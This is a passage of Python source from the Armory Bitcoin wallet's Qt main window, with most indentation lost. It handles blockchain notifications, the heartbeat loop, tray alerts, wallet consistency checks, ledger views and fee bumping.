LOGERROR("Failed update wallet data with error: %s" % e)
return
self.notifyNewZeroConf(args)
self.createCombinedLedger()
elif action == NEW_BLOCK_ACTION:
#A new block has appeared, pull updated ledgers from the BDM, display
#the new block height in the status bar and note the block received time
try:
self.updateWalletData()
except Exception as e:
LOGERROR("Failed update wallet data with error: %s" % e)
return
newBlocks = args[0]
if newBlocks>0:
print 'New Block: ', TheBDM.getTopBlockHeight()
self.ledgerModel.reset()
LOGINFO('New Block! : %d', TheBDM.getTopBlockHeight())
self.createCombinedLedger()
self.blkReceived = RightNow()
self.writeSetting('LastBlkRecvTime', self.blkReceived)
self.writeSetting('LastBlkRecv', TheBDM.getTopBlockHeight())
if self.netMode==NETWORKMODE.Full:
LOGINFO('Current block number: %d', TheBDM.getTopBlockHeight())
# Update the wallet view to immediately reflect new balances
self.walletModel.reset()
self.updateStatusBarText()
elif action == REFRESH_ACTION:
#The wallet ledgers have been updated from an event outside of new ZC
#or new blocks (usually a wallet or address was imported, or the
#wallet filter was modified)
try:
self.updateWalletData()
except Exception as e:
LOGERROR("Failed update wallet data with error: %s" % e)
return
reset = False
if len(args) == 0:
self.createCombinedLedger()
return
for wltID in args:
if len(wltID) > 0:
if wltID in self.walletMap:
wlt = self.walletMap[wltID]
wlt.isEnabled = True
self.walletModel.reset()
wlt.doAfterScan()
self.changeWltFilter()
if wltID in self.oneTimeScanAction:
postScanAction = self.oneTimeScanAction[wltID]
del self.oneTimeScanAction[wltID]
if callable(postScanAction):
postScanAction()
elif wltID in self.lockboxIDMap:
lbID = self.lockboxIDMap[wltID]
self.allLockboxes[lbID].isEnabled = True
if self.lbDialogModel != None:
self.lbDialogModel.reset()
if self.lbDialog != None:
self.lbDialog.changeLBFilter()
elif wltID == "wallet_filter_changed":
reset = True
            if wltID in self.walletSideScanProgress:
del self.walletSideScanProgress[wltID]
self.createCombinedLedger(reset)
elif action == WARNING_ACTION:
#something went wrong on the C++ side, create a message box to report
#it to the user
if 'rescan' in args[0].lower() or 'rebuild' in args[0].lower():
result = MsgBoxWithDNAA(self, self, MSGBOX.Critical, self.tr('BDM error!'), args[0],
self.tr("Rebuild and rescan on next start"), dnaaStartChk=False)
if result[1] == True:
touchFile( os.path.join(ARMORY_HOME_DIR, 'rebuild.flag') )
elif 'factory reset' in args[0].lower():
result = MsgBoxWithDNAA(self, self, MSGBOX.Critical, self.tr('BDM error!'), args[0],
self.tr("Factory reset on next start"), dnaaStartChk=False)
if result[1] == True:
DlgFactoryReset(self, self).exec_()
else:
QMessageBox.critical(self, self.tr('BlockDataManager Warning'), \
args[0], \
QMessageBox.Ok)
#this is a critical error reporting channel, should kill the app right
#after
os._exit(0)
elif action == SCAN_ACTION:
wltIDList = args[0]
prog = args[1]
hasWallet = False
hasLockbox = False
for wltID in wltIDList:
self.walletSideScanProgress[wltID] = prog*100
if len(wltID) > 0:
if wltID in self.walletMap:
wlt = self.walletMap[wltID]
wlt.disableWalletUI()
if wltID in self.walletDialogDict:
self.walletDialogDict[wltID].reject()
del self.walletDialogDict[wltID]
hasWallet = True
else:
lbID = self.lockboxIDMap[wltID]
self.allLockboxes[lbID].isEnabled = False
hasLockbox = True
self.walletModel.reset()
if hasWallet:
self.changeWltFilter()
if hasLockbox:
if self.lbDialogModel != None:
self.lbDialogModel.reset()
if self.lbDialog != None:
self.lbDialog.resetLBSelection()
self.lbDialog.changeLBFilter()
elif action == NODESTATUS_UPDATE:
prevStatus = None
if self.nodeStatus != None:
prevStatus = self.nodeStatus.status_
self.nodeStatus = args[0]
TheSDM.updateState(self.nodeStatus)
if prevStatus != self.nodeStatus.status_:
TheBDM.setWitness(self.nodeStatus.SegWitEnabled_)
if self.nodeStatus.status_ == Cpp.NodeStatus_Offline:
self.showTrayMsg(self.tr('Disconnected'), self.tr('Connection to Bitcoin Core '
                              'client lost! Armory cannot send or '
                              'receive bitcoins until the connection is '
're-established.'), QSystemTrayIcon.Critical,
10000)
elif self.nodeStatus.status_ == Cpp.NodeStatus_Online:
self.showTrayMsg(self.tr('Connected'), self.tr('Connection to Bitcoin Core '
're-established'), \
QSystemTrayIcon.Information, 10000)
self.updateStatusBarText()
self.updateSyncProgress()
elif action == BDM_SCAN_PROGRESS:
self.setDashboardDetails()
self.updateSyncProgress()
elif action == BDV_ERROR:
errorStruct = args[0]
if errorStruct.errType_ == Cpp.Error_ZC:
errorMsg = errorStruct.errorStr_
txHash = errorStruct.extraMsg_
self.zcBroadcastError(txHash, errorMsg)
#############################################################################
def Heartbeat(self, nextBeatSec=1):
"""
This method is invoked when the app is initialized, and will
run every second, or whatever is specified in the nextBeatSec
argument.
"""
# Special heartbeat functions are for special windows that may need
      # to update rapidly (say, every 0.1s) while that window is all that
      # matters at that moment, like a download progress window.
# This is "special" because you are putting all other processing on
# hold while this special window is active
# IMPORTANT: Make sure that the special heartbeat function returns
# a value below zero when it's done OR if it errors out!
# Otherwise, it should return the next heartbeat delay,
# which would probably be something like 0.1 for a rapidly
# updating progress counter
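      # A sketch of that contract (hypothetical example):
      #   def pollDownloadDlg():
      #      if dlg.isDone(): return -1   # negative => done, special list is cleared
      #      dlg.updateBar()
      #      return 0.1                   # poll again in 100ms
      #   self.extraHeartbeatSpecial.append(pollDownloadDlg)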
for fn in self.extraHeartbeatSpecial:
try:
nextBeat = fn()
if nextBeat>0:
reactor.callLater(nextBeat, self.Heartbeat)
else:
self.extraHeartbeatSpecial = []
reactor.callLater(1, self.Heartbeat)
except:
LOGEXCEPT('Error in special heartbeat function')
self.extraHeartbeatSpecial = []
reactor.callLater(1, self.Heartbeat)
return
if TheBDM.exception != "":
QMessageBox.warning(self, self.tr('Database Error'), self.tr(
'The DB has returned the following error: <br><br> '
'<b> %1 </b> <br><br> Armory will now shutdown.').arg(TheBDM.exception), QMessageBox.Ok)
self.closeForReal()
# SatoshiDaemonManager
# BlockDataManager
sdmState = TheSDM.getSDMState()
bdmState = TheBDM.getState()
self.heartbeatCount += 1
try:
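         # Entries in extraHeartbeatAlways are either plain callables or
         # [func, argsList, keepRunning] triples; one-shot triples
         # (keepRunning==False) are removed right before being invoked.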
for func in self.extraHeartbeatAlways:
if isinstance(func, list):
fnc = func[0]
kargs = func[1]
keep_running = func[2]
if keep_running == False:
self.extraHeartbeatAlways.remove(func)
fnc(*kargs)
else:
func()
if self.doAutoBitcoind:
if (sdmState in ['BitcoindInitializing','BitcoindSynchronizing']) or \
(sdmState == 'BitcoindReady' and bdmState==BDM_SCANNING):
self.updateSyncProgress()
else:
if bdmState in (BDM_OFFLINE,BDM_UNINITIALIZED):
# This call seems out of place, but it's because if you are in offline
# mode, it needs to check periodically for the existence of Bitcoin Core
# so that it can enable the "Go Online" button
self.setDashboardDetails()
return
elif bdmState==BDM_SCANNING: # TODO - Move to handle cpp notification
self.updateSyncProgress()
if self.netMode==NETWORKMODE.Disconnected:
if self.isOnlineModePossible():
self.switchNetworkMode(NETWORKMODE.Full)
if bdmState==BDM_BLOCKCHAIN_READY:
# Trigger any notifications, if we have them... TODO - Remove add to new block, and block chain ready
self.doTheSystemTrayThing()
# Any extra functions that may have been injected to be run TODO - Call on New block
# when new blocks are received.
if len(self.extraNewBlockFunctions) > 0:
cppHead = TheBDM.getMainBlockFromDB(self.currBlockNum)
pyBlock = PyBlock().unserialize(cppHead.getSerializedBlock())
for blockFunc in self.extraNewBlockFunctions:
blockFunc(pyBlock)
# TODO - remove
for func in self.extraHeartbeatOnline:
func()
except:
# When getting the error info, don't collect the traceback in order to
# avoid circular references. https://docs.python.org/2/library/sys.html
# has more info.
LOGEXCEPT('Error in heartbeat function')
(errType, errVal) = sys.exc_info()[:2]
errStr = 'Error Type: %s\nError Value: %s' % (errType, errVal)
LOGERROR(errStr)
finally:
reactor.callLater(nextBeatSec, self.Heartbeat)
#############################################################################
def printAlert(self, moneyID, ledgerAmt, txAmt):
'''
Function that prints a notification for a transaction that affects an
address we control.
'''
dispLines = QStringList()
title = ''
totalStr = coin2strNZS(txAmt)
if moneyID in self.walletMap:
wlt = self.walletMap[moneyID]
if len(wlt.labelName) <= 20:
dispName = '"%(name)s"' % { 'name' : wlt.labelName }
else:
dispName = '"%(shortname)s..."' % { 'shortname' : wlt.labelName[:17] }
dispName = self.tr('Wallet %1 (%2)').arg(dispName, wlt.uniqueIDB58)
elif moneyID in self.cppLockboxWltMap:
lbox = self.getLockboxByID(moneyID)
if len(lbox.shortName) <= 20:
dispName = '%(M)d-of-%(N)d "%(shortname)s"' % { 'M' : lbox.M, 'N' : lbox.N, 'shortname' : lbox.shortName}
else:
dispName = ('%(M)d-of-%(N)d "%(shortname)s..."') % {'M' : lbox.M, 'N' : lbox.N, 'shortname' : lbox.shortName[:17] }
dispName = self.tr('Lockbox %1 (%2)').arg(dispName, lbox.uniqueIDB58)
else:
LOGERROR('Asked to show notification for wlt/lbox we do not have')
return
# Collected everything we need to display, now construct it and do it.
if ledgerAmt > 0:
# Received!
title = self.tr('Bitcoins Received!')
dispLines.append(self.tr('Amount: %1 BTC').arg(totalStr ))
dispLines.append(self.tr('Recipient: %1').arg(dispName))
elif ledgerAmt < 0:
# Sent!
title = self.tr('Bitcoins Sent!')
dispLines.append(self.tr('Amount: %1 BTC').arg(totalStr))
dispLines.append(self.tr('Sender: %1').arg(dispName))
self.showTrayMsg(title, dispLines.join('\n'), \
QSystemTrayIcon.Information, 10000)
LOGINFO(title)
#############################################################################
def doTheSystemTrayThing(self):
"""
I named this method as it is because this is not just "show a message."
I need to display all relevant transactions, in sequence that they were
received. I will store them in self.notifyQueue, and this method will
do nothing if it's empty.
"""
if not TheBDM.getState()==BDM_BLOCKCHAIN_READY or \
RightNow()<self.notifyBlockedUntil:
return
# Notify queue input is: [WltID/LBID, LedgerEntry, alreadyNotified]
for i in range(len(self.notifyQueue)):
moneyID, le, alreadyNotified = self.notifyQueue[i]
# Skip the ones we've notified of already.
if alreadyNotified:
continue
         # Mark it alreadyNotified=True
self.notifyQueue[i][2] = True
# Catch condition that somehow the tx isn't related to us
if le.getTxHash()=='\x00'*32:
continue
# Make sure the wallet ID or lockbox ID keys are actually valid before
# using them to grab the appropriate C++ wallet.
pywlt = self.walletMap.get(moneyID)
lbox = self.getLockboxByID(moneyID)
# If we couldn't find a matching wallet or lbox, bail
if pywlt is None and lbox is None:
LOGERROR('Could not find moneyID = %s; skipping notify' % moneyID)
continue
if pywlt:
wname = self.walletMap[moneyID].labelName
if len(wname)>20:
wname = wname[:17] + '...'
wltName = self.tr('Wallet "%1" (%2)').arg(wname, moneyID)
else:
         # lbox was already fetched above; reuse it instead of re-querying
         M = lbox.M
         N = lbox.N
         lname = lbox.shortName
if len(lname) > 20:
lname = lname[:17] + '...'
wltName = self.tr('Lockbox %1-of-%2 "%3" (%4)').arg(M).arg(N).arg(lname, moneyID)
if le.isSentToSelf():
# Used to display the sent-to-self amount, but if this is a lockbox
# we only have a cppWallet, and the determineSentToSelfAmt() func
# only operates on python wallets. Oh well, the user can double-
# click on the tx in their ledger if they want to see what's in it.
# amt = determineSentToSelfAmt(le, cppWlt)[0]
# self.showTrayMsg('Your bitcoins just did a lap!', \
# 'Wallet "%s" (%s) just sent %s BTC to itself!' % \
# (wlt.labelName, moneyID, coin2str(amt,maxZeros=1).strip()),
self.showTrayMsg(self.tr('Your bitcoins just did a lap!'), \
self.tr('%1 just sent some BTC to itself!').arg(wltName), \
QSystemTrayIcon.Information, 10000)
return
# If coins were either received or sent from the loaded wlt/lbox
dispLines = QStringList()
totalStr = coin2strNZS(abs(le.getValue()))
title = None
if le.getValue() > 0:
title = self.tr('Bitcoins Received!')
dispLines.append(self.tr('Amount: %1 BTC').arg(totalStr))
         dispLines.append(self.tr('Recipient: %1').arg(wltName))
elif le.getValue() < 0:
try:
recipStr = ''
for addr in le.getScrAddrList():
if pywlt.hasScrAddr(addr):
continue
if len(recipStr)==0:
recipStr = scrAddr_to_addrStr(addr)
else:
recipStr = self.tr('<Multiple Recipients>')
title = self.tr('Bitcoins Sent!')
dispLines.append(unicode(self.tr('Amount: %1 BTC').arg(totalStr)))
dispLines.append(unicode(self.tr('From: %1').arg(wltName )))
dispLines.append(unicode(self.tr('To: %1').arg(recipStr)))
except Exception as e:
LOGERROR('tx broadcast systray display failed with error: %s' % e)
if title:
self.showTrayMsg(title, dispLines.join("\n"), \
QSystemTrayIcon.Information, 10000)
LOGINFO(title + '\n' + dispLines.join("\n"))
# Wait for 5 seconds before processing the next queue object.
self.notifyBlockedUntil = RightNow() + 5
return
#############################################################################
def closeEvent(self, event=None):
moc = self.getSettingOrSetDefault('MinimizeOrClose', 'DontKnow')
doClose, doMinimize = False, False
if moc=='DontKnow':
reply,remember = MsgBoxWithDNAA(self, self, MSGBOX.Question, self.tr('Minimize or Close'), \
self.tr('Would you like to minimize Armory to the system tray instead '
'of closing it?'), dnaaMsg=self.tr('Remember my answer'), \
yesStr=self.tr('Minimize'), noStr=self.tr('Close'))
if reply==True:
doMinimize = True
if remember:
self.writeSetting('MinimizeOrClose', 'Minimize')
else:
            doClose = True
if remember:
self.writeSetting('MinimizeOrClose', 'Close')
if doMinimize or moc=='Minimize':
self.minimizeArmory()
if event:
event.ignore()
elif doClose or moc=='Close':
self.doShutdown = True
self.sysTray.hide()
self.closeForReal()
         if event:
            event.ignore()
else:
return # how would we get here?
#############################################################################
def unpackLinuxTarGz(self, targzFile, changeSettings=True):
if targzFile is None:
return None
if not os.path.exists(targzFile):
return None
unpackDir = os.path.join(ARMORY_HOME_DIR, 'latestBitcoinInst')
unpackDir2 = os.path.join(ARMORY_HOME_DIR, 'latestBitcoinInstOld')
if os.path.exists(unpackDir):
if os.path.exists(unpackDir2):
shutil.rmtree(unpackDir2)
shutil.move(unpackDir, unpackDir2)
os.mkdir(unpackDir)
out,err = execAndWait('tar -zxf %s -C %s' % (targzFile, unpackDir), \
timeout=5)
LOGINFO('UNPACK STDOUT: "' + out + '"')
LOGINFO('UNPACK STDERR: "' + err + '"')
# There should only be one subdir
unpackDirChild = None
for fn in os.listdir(unpackDir):
unpackDirChild = os.path.join(unpackDir, fn)
if unpackDirChild is None:
LOGERROR('There was apparently an error unpacking the file')
return None
finalDir = os.path.abspath(unpackDirChild)
LOGWARN('Bitcoin Core unpacked into: %s', finalDir)
if changeSettings:
self.settings.set('SatoshiExe', finalDir)
return finalDir
#############################################################################
def closeForReal(self):
'''
Unlike File->Quit or clicking the X on the window, which may actually
minimize Armory, this method is for *really* closing Armory
'''
self.setCursor(Qt.WaitCursor)
self.showShuttingDownMessage()
try:
# Save the main window geometry in the settings file
try:
self.writeSetting('MainGeometry', str(self.saveGeometry().toHex()))
self.writeSetting('MainWalletCols', saveTableView(self.walletsView))
self.writeSetting('MainLedgerCols', saveTableView(self.ledgerView))
except:
pass
if TheBDM.getState()==BDM_SCANNING:
LOGINFO('BDM state is scanning -- force shutdown BDM')
else:
LOGINFO('BDM is safe for clean shutdown')
TheSDM.stopBitcoind()
TheBDM.shutdown()
# Remove Temp Modules Directory if it exists:
if self.tempModulesDirName:
shutil.rmtree(self.tempModulesDirName)
except:
         # Don't want a strange error here to interrupt shutdown
LOGEXCEPT('Strange error during shutdown')
LOGINFO('Attempting to close the main window!')
self.signalExecution.executeMethod(QAPP.quit)
#############################################################################
def execTrigger(self, toSpawn):
super(ArmoryDialog, toSpawn).exec_()
#############################################################################
def initTrigger(self, toInit):
if isinstance(toInit, DlgProgress):
toInit.setup(self)
toInit.status = 1
#############################################################################
def checkForNegImports(self):
negativeImports = []
for wlt in self.walletMap:
if self.walletMap[wlt].hasNegativeImports:
negativeImports.append(self.walletMap[wlt].uniqueIDB58)
# If we detect any negative import
if len(negativeImports) > 0:
logDirs = []
for wltID in negativeImports:
if not wltID in self.walletMap:
continue
homedir = os.path.dirname(self.walletMap[wltID].walletPath)
wltlogdir = os.path.join(homedir, wltID)
if not os.path.exists(wltlogdir):
continue
for subdirname in os.listdir(wltlogdir):
subdirpath = os.path.join(wltlogdir, subdirname)
logDirs.append([wltID, subdirpath])
DlgInconsistentWltReport(self, self, logDirs).exec_()
#############################################################################
def getAllRecoveryLogDirs(self, wltIDList):
self.logDirs = []
for wltID in wltIDList:
if not wltID in self.walletMap:
continue
homedir = os.path.dirname(self.walletMap[wltID].walletPath)
logdir = os.path.join(homedir, wltID)
if not os.path.exists(logdir):
continue
self.logDirs.append([wltID, logdir])
return self.logDirs
#############################################################################
@AllowAsync
def CheckWalletConsistency(self, wallets, prgAt=None):
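      # prgAt is a shared 3-element list: [0] overall progress (0-10000),
      # [1] weight of the wallet currently being checked, [2] handshake
      # flag (1 = checks finished, 2 = status UI acknowledged; see
      # UpdateConsistencyCheckMessage below).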
if prgAt:
totalSize = 0
walletSize = {}
for wlt in wallets:
statinfo = os.stat(wallets[wlt].walletPath)
walletSize[wlt] = statinfo.st_size
totalSize = totalSize + statinfo.st_size
i=0
dlgrdy = [0]
nerrors = 0
for wlt in wallets:
if prgAt:
prgAt[0] = i
f = 10000*walletSize[wlt]/totalSize
prgAt[1] = f
i = f +i
self.wltCstStatus = WalletConsistencyCheck(wallets[wlt], prgAt)
if self.wltCstStatus[0] != 0:
self.WltCstError(wallets[wlt], self.wltCstStatus[1], dlgrdy)
while not dlgrdy[0]:
time.sleep(0.01)
nerrors = nerrors +1
prgAt[2] = 1
dlgrdy[0] = 0
while prgAt[2] != 2:
time.sleep(0.1)
if nerrors == 0:
self.emit(SIGNAL('UWCS'), [1, self.tr('All wallets are consistent'), 10000, dlgrdy])
self.emit(SIGNAL('checkForNegImports'))
else:
         while not dlgrdy[0]:
self.emit(SIGNAL('UWCS'), [1, self.tr('Consistency Check Failed!'), 0, dlgrdy])
time.sleep(1)
self.checkRdyForFix()
def checkRdyForFix(self):
#check BDM first
time.sleep(1)
self.dlgCptWlt.emit(SIGNAL('Show'))
while 1:
if TheBDM.getState() == BDM_SCANNING:
canFix = self.tr(
'The wallet analysis tool will become available '
'as soon as Armory is done loading. You can close this '
'window and it will reappear when ready.')
self.dlgCptWlt.UpdateCanFix([canFix])
time.sleep(1)
elif TheBDM.getState() == BDM_OFFLINE or \
TheBDM.getState() == BDM_UNINITIALIZED:
TheSDM.setDisabled(True)
CLI_OPTIONS.offline = True
break
else:
break
#check running dialogs
self.dlgCptWlt.emit(SIGNAL('Show'))
runningList = []
while 1:
listchanged = 0
canFix = []
for dlg in runningList:
if dlg not in runningDialogsList:
runningList.remove(dlg)
listchanged = 1
for dlg in runningDialogsList:
if not isinstance(dlg, DlgCorruptWallet):
if dlg not in runningList:
runningList.append(dlg)
listchanged = 1
if len(runningList):
if listchanged:
canFix.append(self.tr(
                  '<b>The following dialogs need to be closed before you can '
'run the wallet analysis tool:</b>'))
canFix.extend([str(myobj.windowTitle()) for myobj in runningList])
self.dlgCptWlt.UpdateCanFix(canFix)
time.sleep(0.2)
else:
break
canFix.append('Ready to analyze inconsistent wallets!')
self.dlgCptWlt.UpdateCanFix(canFix, True)
self.dlgCptWlt.exec_()
def checkWallets(self):
nwallets = len(self.walletMap)
if nwallets > 0:
self.prgAt = [0, 0, 0]
self.pbarWalletProgress = QProgressBar()
self.pbarWalletProgress.setMaximum(10000)
self.pbarWalletProgress.setMaximumSize(300, 22)
self.pbarWalletProgress.setStyleSheet('text-align: center; margin-bottom: 2px; margin-left: 10px;')
self.pbarWalletProgress.setFormat(self.tr('Wallet Consistency Check: %p%'))
self.pbarWalletProgress.setValue(0)
self.statusBar().addWidget(self.pbarWalletProgress)
self.connect(self, SIGNAL('UWCS'), self.UpdateWalletConsistencyStatus)
self.connect(self, SIGNAL('PWCE'), self.PromptWltCstError)
self.CheckWalletConsistency(self.walletMap, self.prgAt, async=True)
self.UpdateConsistencyCheckMessage(async = True)
@AllowAsync
def UpdateConsistencyCheckMessage(self):
while self.prgAt[2] == 0:
self.emit(SIGNAL('UWCS'), [0, self.prgAt[0]])
time.sleep(0.5)
self.emit(SIGNAL('UWCS'), [2])
self.prgAt[2] = 2
def UpdateWalletConsistencyStatus(self, msg):
if msg[0] == 0:
self.pbarWalletProgress.setValue(msg[1])
elif msg[0] == 1:
self.statusBar().showMessage(msg[1], msg[2])
msg[3][0] = 1
else:
self.pbarWalletProgress.hide()
def WltCstError(self, wlt, status, dlgrdy):
self.emit(SIGNAL('PWCE'), dlgrdy, wlt, status)
LOGERROR('Wallet consistency check failed! (%s)', wlt.uniqueIDB58)
def PromptWltCstError(self, dlgrdy, wallet=None, status='', mode=None):
if not self.dlgCptWlt:
self.dlgCptWlt = DlgCorruptWallet(wallet, status, self, self)
dlgrdy[0] = 1
else:
self.dlgCptWlt.addStatus(wallet, status)
if not mode:
self.dlgCptWlt.show()
else:
self.dlgCptWlt.exec_()
#############################################################################
def loadNewPage(self):
pageInt = int(self.PageLineEdit.text())
if pageInt == self.mainLedgerCurrentPage:
return
if pageInt < 0 or pageInt > TheBDM.bdv().getWalletsPageCount():
self.PageLineEdit.setText(str(self.mainLedgerCurrentPage))
return
previousPage = self.mainLedgerCurrentPage
try:
self.mainLedgerCurrentPage = pageInt
self.createCombinedLedger()
except:
self.mainLedgerCurrentPage = previousPage
self.PageLineEdit.setText(str(self.mainLedgerCurrentPage))
#############################################################################
# System tray notifications require specific code for OS X. We'll handle
# messages here to hide the ugliness.
def showTrayMsg(self, dispTitle, dispText, dispIconType, dispTime):
if not OS_MACOSX:
self.sysTray.showMessage(dispTitle, dispText, dispIconType, dispTime)
else:
# Code supporting Growl (OSX 10.7) is buggy, and no one seems to care.
# Just jump straight to 10.8.
self.macNotifHdlr.showNotification(dispTitle, dispText)
#############################################################################
def bdv(self):
return TheBDM.bdv()
#############################################################################
def setupBDV(self):
if self.netMode == NETWORKMODE.Offline:
return
try:
TheBDM.registerBDV()
self.walletManager.setBDVObject(TheBDM.bdv())
except:
self.switchNetworkMode(NETWORKMODE.Offline)
return
for wltId in self.walletMap:
self.walletMap[wltId].registerWallet()
for lbObj in self.allLockboxes:
lbID = lbObj.uniqueIDB58
scrAddrList = lbObj.getScrAddrList()
self.cppLockboxWltMap[lbID] = lbObj.registerLockbox(scrAddrList, False)
#############################################################################
def startBlockchainProcessingInitialization(self):
self.startBitcoindIfNecessary()
self.completeBlockchainProcessingInitialization()
#############################################################################
def completeBlockchainProcessingInitialization(self):
if CLI_OPTIONS.offline:
return
gotDB = self.startArmoryDBIfNecessary()
if gotDB == False:
TheBDM.setState(BDM_OFFLINE)
self.switchNetworkMode(NETWORKMODE.Offline)
QMessageBox.warning(self, self.tr('Database Error'), self.tr(
'Armory failed to spawn the DB!<br> '
'Continuing operations in offline mode instead. <br> '
'Refer to the dbLog.txt for more information.'), QMessageBox.Ok)
self.setDashboardDetails()
return
else:
self.switchNetworkMode(NETWORKMODE.Full)
TheBDM.instantiateBDV(armoryengine.ArmoryUtils.ARMORYDB_PORT)
self.setupBDV()
self.setupLedgerViews()
self.loadBlockchainIfNecessary()
self.setDashboardDetails()
#############################################################################
def setupLedgerViews(self):
if self.netMode == NETWORKMODE.Offline:
return
# Table to display ledger/activity
w,h = tightSizeNChar(self.walletsView, 55)
viewWidth = 1.2*w
sectionSz = 1.3*h
viewHeight = 4.4*sectionSz
self.ledgerTable = []
self.ledgerModel = LedgerDispModelSimple(self.ledgerTable, self, self)
self.ledgerModel.setLedgerDelegate(TheBDM.bdv().getLedgerDelegateForWallets())
self.ledgerModel.setConvertLedgerMethod(self.convertLedgerToTable)
self.frmLedgUpDown = QFrame()
self.ledgerView = ArmoryTableView(self, self, self.frmLedgUpDown)
self.ledgerView.setModel(self.ledgerModel)
self.ledgerView.setSortingEnabled(True)
self.ledgerView.setItemDelegate(LedgerDispDelegate(self))
self.ledgerView.setSelectionBehavior(QTableView.SelectRows)
self.ledgerView.setSelectionMode(QTableView.SingleSelection)
self.ledgerView.verticalHeader().setDefaultSectionSize(sectionSz)
self.ledgerView.verticalHeader().hide()
self.ledgerView.horizontalHeader().setResizeMode(0, QHeaderView.Fixed)
self.ledgerView.horizontalHeader().setResizeMode(3, QHeaderView.Fixed)
self.ledgerView.hideColumn(LEDGERCOLS.isOther)
self.ledgerView.hideColumn(LEDGERCOLS.UnixTime)
self.ledgerView.hideColumn(LEDGERCOLS.WltID)
self.ledgerView.hideColumn(LEDGERCOLS.TxHash)
self.ledgerView.hideColumn(LEDGERCOLS.isCoinbase)
self.ledgerView.hideColumn(LEDGERCOLS.toSelf)
self.ledgerView.hideColumn(LEDGERCOLS.optInRBF)
# Another table and model, for lockboxes
self.currentLBPage = 0
self.lockboxLedgTable = []
self.lockboxLedgModel = LedgerDispModelSimple(self.lockboxLedgTable,
self, self, isLboxModel=True)
self.lockboxLedgModel.setLedgerDelegate(TheBDM.bdv().getLedgerDelegateForLockboxes())
self.lockboxLedgModel.setConvertLedgerMethod(self.convertLedgerToTable)
self.lbDialogModel = None
dateWidth = tightSizeStr(self.ledgerView, '_9999-Dec-99 99:99pm__')[0]
cWidth = 20 # num-confirm icon width
tWidth = 72 # date icon width
initialColResize(self.ledgerView, [cWidth, 0, dateWidth, tWidth, 0.30, 0.40, 0.3])
self.connect(self.ledgerView, SIGNAL('doubleClicked(QModelIndex)'), \
self.dblClickLedger)
self.ledgerView.setContextMenuPolicy(Qt.CustomContextMenu)
self.ledgerView.customContextMenuRequested.connect(self.showContextMenuLedger)
self.connect(self.ledgerView.horizontalHeader(), \
SIGNAL('sortIndicatorChanged(int,Qt::SortOrder)'), \
self.changeLedgerSorting)
#page selection UI
self.mainLedgerCurrentPage = 1
self.lblPages = QRichLabel('Page: ')
self.PageLineEdit = QLineEdit('1')
self.lblNPages = QRichLabel(' out of 1')
self.connect(self.PageLineEdit, SIGNAL('editingFinished()'), \
self.loadNewPage)
self.changeWltFilter()
# Will fill this in when ledgers are created & combined
self.lblLedgShowing = QRichLabel('Showing:', hAlign=Qt.AlignHCenter)
self.lblLedgRange = QRichLabel('', hAlign=Qt.AlignHCenter)
self.lblLedgTotal = QRichLabel('', hAlign=Qt.AlignHCenter)
self.comboNumShow = QComboBox()
for s in self.numShowOpts:
self.comboNumShow.addItem( str(s) )
self.comboNumShow.setCurrentIndex(0)
self.comboNumShow.setMaximumWidth( tightSizeStr(self, '_9999_')[0]+25 )
self.btnLedgUp = QLabelButton('')
self.btnLedgUp.setMaximumHeight(20)
self.btnLedgUp.setPixmap(QPixmap(':/scroll_up_18.png'))
self.btnLedgUp.setAlignment(Qt.AlignVCenter | Qt.AlignHCenter)
self.btnLedgUp.setVisible(False)
self.btnLedgDn = QLabelButton('')
self.btnLedgDn.setMaximumHeight(20)
self.btnLedgDn.setPixmap(QPixmap(':/scroll_down_18.png'))
self.btnLedgDn.setAlignment(Qt.AlignVCenter | Qt.AlignHCenter)
self.connect(self.comboNumShow, SIGNAL('activated(int)'), self.changeNumShow)
self.connect(self.btnLedgUp, SIGNAL('clicked()'), self.clickLedgUp)
self.connect(self.btnLedgDn, SIGNAL('clicked()'), self.clickLedgDn)
frmFilter = makeVertFrame([QLabel(self.tr('Filter:')), self.comboWltSelect, 'Stretch'])
frmLower = makeHorizFrame([ frmFilter, \
'Stretch', \
self.frmLedgUpDown, \
'Stretch', \
self.frmTotals])
# Now add the ledger to the bottom of the window
ledgLayout = QGridLayout()
ledgLayout.addWidget(self.ledgerView, 1,0)
ledgLayout.addWidget(frmLower, 2,0)
ledgLayout.setRowStretch(0, 0)
ledgLayout.setRowStretch(1, 1)
ledgLayout.setRowStretch(2, 0)
self.tabActivity = QWidget()
self.tabActivity.setLayout(ledgLayout)
self.mainDisplayTabs.addTab(self.tabActivity, self.tr('Transactions'))
hexledgsz = self.settings.get('MainLedgerCols')
if len(hexledgsz)>0:
restoreTableView(self.ledgerView, hexledgsz)
self.ledgerView.setColumnWidth(LEDGERCOLS.NumConf, 20)
self.ledgerView.setColumnWidth(LEDGERCOLS.TxDir, 72)
#############################################################################
def bumpFee(self, walletId, txHash):
#grab wallet
wlt = self.walletMap[walletId]
#grab ZC from DB
zctx = TheBDM.bdv().getTxByHash(txHash)
pytx = PyTx().unserialize(zctx.serialize())
#create tx batch
batch = Cpp.TransactionBatch()
for txin in pytx.inputs:
outpoint = txin.outpoint
batch.addSpender(binary_to_hex(outpoint.txHash), \
outpoint.txOutIndex, txin.intSeq)
for txout in pytx.outputs:
script = txout.getScript()
scrAddr = BtcUtils().getScrAddrForScript(script)
addrComment = wlt.getCommentForAddress(scrAddr)
b58Addr = scrAddr_to_addrStr(scrAddr)
if addrComment == CHANGE_ADDR_DESCR_STRING:
#change address
batch.setChange(b58Addr)
else:
#recipient
batch.addRecipient(b58Addr, txout.value)
batch.setWalletID(walletId)
#feed batch to spend dlg
batchStr = batch.serialize()
dlgSpend = DlgSendBitcoins(None, self, self)
dlgSpend.frame.prefillFromBatch(batchStr)
dlgSpend.exec_()
#############################################################################
def walletTimeoutCheck(self):
for idx,wltID in enumerate(self.walletIDList):
self.walletMap[wltID].checkWalletLockTimeout()
self.signalExecution.callLater(2, self.walletTimeoutCheck)
############################################
def checkForAlreadyOpen():
from armoryengine.ProcessMutex import PySide_ProcessMutex
LOGDEBUG('Checking for already open socket...')
prc_mutex = PySide_ProcessMutex(CLI_OPTIONS.interport, None)
urilink = ""
if CLI_ARGS:
urilink = str(CLI_ARGS[0])
if prc_mutex.test(urilink) == True:
LOGERROR('Socket already in use. Sent CLI args to existing proc.')
LOGERROR('Exiting...')
os._exit(0)
############################################
if 1:
if CLI_OPTIONS.interport > 1:
checkForAlreadyOpen()
pixLogo = QPixmap(':/splashlogo.png')
if USE_TESTNET or USE_REGTEST:
pixLogo = QPixmap(':/splashlogo_testnet.png')
SPLASH = ArmorySplashScreen(pixLogo)
SPLASH.setMask(pixLogo.mask())
SPLASH.show()
QAPP.processEvents()
# Will make this customizable
